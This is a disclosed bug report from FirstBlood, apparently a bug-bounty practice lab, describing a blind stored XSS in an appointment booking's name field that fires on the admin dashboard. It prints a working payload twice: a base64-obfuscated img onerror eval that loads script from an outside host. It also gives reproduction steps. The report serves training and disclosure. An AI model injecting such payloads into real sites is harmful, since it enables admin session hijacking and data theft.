FirstBlood-#1608 — Blind XSS on Internal Dashboard of Adminstrator (Manage Appointments)
This issue was discovered on FirstBlood v3
On 2022-12-12, mr_xhunt 
Level 8
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Summary:
Found Blind XSS on the Internal Dashboard of the Administrator, where the Administrator can view and Manage the Appointments.
Steps To Reproduce:
- Create an Appointment and Intercept the Request in the Burp
- Now in the Burpsuite Change the
fname with the payload : x"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXJ4aHVudC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
NOTE: You must add ambulance parameter as well with value equal to 1
- Wait for a few hrs or days (mine though executed after a few days) the XSS will execute
Impact:
The Attacker can run arbitrary Scripts and can Fuzz all the endpoints available their and Can get the data using webhook Url.
Remediation:
Any parameter which is directly inserted into the source must be Sanitized first and Checked for containing any malicious payload
P1 CRITICAL
Endpoint: /manage_appointment.php
Parameter: fname
Payload: x"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vbXJ4aHVudC54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>
FirstBlood ID: 78
Vulnerability Type: Stored XSS
When booking an appointment with the ambulance value set to "1", the users full name is vulnerable to stored XSS on the internal admin panel "firstblood-helper.com"
Report Feedback
Creator & Administrator
CONGRATULATIONS, you were first to report this bug and you have won a LIMITED edition BugBountyHunter backpack!